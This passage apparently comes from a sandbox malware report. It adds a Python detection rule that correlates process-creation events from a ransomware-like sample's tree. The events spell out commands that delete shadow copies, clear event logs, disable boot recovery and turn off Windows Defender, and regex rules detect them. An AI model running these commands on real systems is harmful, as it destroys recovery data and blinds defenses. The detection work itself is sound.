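Everything in the tree above hangs off one parent: service stops and disables, Defender policy and service-start registry edits, scheduled-task disables, shadow copy deletion, event log clearing, bcdedit recovery changes, definition removal and Set-MpPreference. That clustering is what a detection should key on, because each command in isolation also appears in legitimate administration. The Python below is an added example and not part of the report: it runs a small rule set over constructed process-creation events (command lines and PIDs copied from the tree, parent PIDs taken from its nesting; the sample's own parent and the benign "sc query" pair at the end are placeholders that are not in the report) and raises one alert per root process that combines at least three distinct techniques. The technique IDs are current ATT&CK Enterprise IDs assigned here, not the v6 mapping the report used.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 or Security 4688 fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

# Constructed event set. Command lines and PIDs are copied from the report's
# process tree and parent PIDs follow its nesting; the sample's own parent (0)
# and the benign "sc query" pair at the end are placeholders not in the report.
EVENTS = [
    ProcEvent(1740, 0, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(1544, 1740, r"C:\Windows\system32\net.exe", 'net.exe stop "NetMsmqActivator" /y'),
    ProcEvent(556, 1544, r"C:\Windows\system32\net1.exe", r'C:\Windows\system32\net1 stop "NetMsmqActivator" /y'),
    ProcEvent(812, 1740, r"C:\Windows\system32\net.exe", 'net.exe stop "VSS" /y'),
    ProcEvent(1996, 812, r"C:\Windows\system32\net1.exe", r'C:\Windows\system32\net1 stop "VSS" /y'),
    ProcEvent(776, 1740, r"C:\Windows\system32\sc.exe", 'sc.exe config "VSS" start= disabled'),
    ProcEvent(1136, 1740, r"C:\Windows\system32\reg.exe", r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    ProcEvent(1256, 1740, r"C:\Windows\system32\reg.exe", r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'),
    ProcEvent(1968, 1740, r"C:\Windows\system32\schtasks.exe", r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    ProcEvent(516, 1740, r"C:\Windows\system32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent(1960, 1740, r"C:\Windows\system32\wevtutil.exe", "wevtutil.exe cl system"),
    ProcEvent(460, 1740, r"C:\Windows\System32\Wbem\wmic.exe", "wmic.exe shadowcopy delete"),
    ProcEvent(2084, 1740, r"C:\Windows\system32\bcdedit.exe", "bcdedit.exe /set {default} recoveryenabled no"),
    ProcEvent(2104, 1740, r"C:\Windows\system32\cmd.exe", r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ProcEvent(2124, 2104, r"C:\Program Files\Windows Defender\MpCmdRun.exe", r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ProcEvent(2224, 1740, r"C:\Windows\system32\cmd.exe", "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(2244, 2224, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(3000, 0, r"C:\Windows\system32\cmd.exe", 'cmd.exe /c sc.exe query "VSS"'),
    ProcEvent(3004, 3000, r"C:\Windows\system32\sc.exe", 'sc.exe query "VSS"'),
]

# (rule name, current ATT&CK Enterprise technique ID, command-line pattern).
# The IDs are this example's mapping; the report itself used ATT&CK v6.
RULES = [
    ("service_stop", "T1489", re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+"?(vss|wbengine|sdrsvc|samss|netmsmqactivator|sstpsvc|ui0detect|webclient)\b', re.I)),
    ("service_disable", "T1489", re.compile(r'\bsc(?:\.exe)?\s+config\s+.*\bstart=\s*disabled', re.I)),
    ("shadow_copy_delete", "T1490", re.compile(r'vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete', re.I)),
    ("boot_recovery_off", "T1490", re.compile(r'bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)', re.I)),
    ("event_log_clear", "T1070.001", re.compile(r'wevtutil(?:\.exe)?\s+cl\s+\w+', re.I)),
    ("defender_policy_reg", "T1562.001", re.compile(r'reg(?:\.exe)?\s+(?:add|delete)\s+"?hklm\\software\\policies\\microsoft\\windows defender', re.I)),
    ("defender_service_off", "T1562.001", re.compile(r'reg(?:\.exe)?\s+add\s+"?hklm\\system\\currentcontrolset\\services\\(windefend|wdfilter|wdboot|wdnisdrv|wdnissvc|securityhealthservice)"?\s+/v\s+"?start"?.*\s/d\s+"?4\b', re.I)),
    ("defender_task_disable", "T1562.001", re.compile(r'schtasks(?:\.exe)?\s+/change\s+/tn\s+".*(windows defender|exploitguard).*"\s+/disable', re.I)),
    ("defender_definitions_removed", "T1562.001", re.compile(r'mpcmdrun(?:\.exe)?"?\s+-removedefinitions', re.I)),
    ("defender_preference_off", "T1562.001", re.compile(r'set-mppreference\s+-disable\w+\s+\$?true', re.I)),
]


def root_of(pid, by_pid):
    """Walk parent links up to the top-most process we hold an event for."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def evaluate(events, min_techniques=3):
    """Attribute every rule hit to the root of its process tree and return the
    roots that combine at least `min_techniques` distinct techniques."""
    by_pid = {e.pid: e for e in events}
    per_root = defaultdict(lambda: {"rules": set(), "techniques": set(), "hits": []})
    for e in events:
        for name, technique, rx in RULES:
            if rx.search(e.cmdline):
                r = per_root[root_of(e.pid, by_pid)]
                r["rules"].add(name)
                r["techniques"].add(technique)
                r["hits"].append((e.pid, name))
    return {root: r for root, r in per_root.items() if len(r["techniques"]) >= min_techniques}


if __name__ == "__main__":
    for root, r in evaluate(EVENTS).items():
        print(f"ALERT root PID {root}: {sorted(r['techniques'])} via {sorted(r['rules'])}")
```

Two points carry over to a real deployment. Security 4688 only includes the command line when "Include command line in process creation events" is enabled, and Sysmon does so by default. Keying the parent walk on PID alone is what the example does for brevity; the report's own tree shows PIDs 576 and 916 reused within the run, so production code should key on the Sysmon ProcessGuid (or PID plus creation time) instead.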
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 498f1c253611cac413f65403757d90f8
  SHA1: 97945cc9a58405d5526f329fb7551394aba52100
  SHA256: ef60d8f7d1952f9c10aedc972ec5152933aa02595470d61fc6f5645f6570ca0f
  SHA512: 7340d71e6d4cbf8a5ace8b5dcca0b6afd53d355c6ce84bf361f623f2752033f4e7f211b728df4e055842f84785fe1db54b477aa22c75b290e5add9832c6d76f3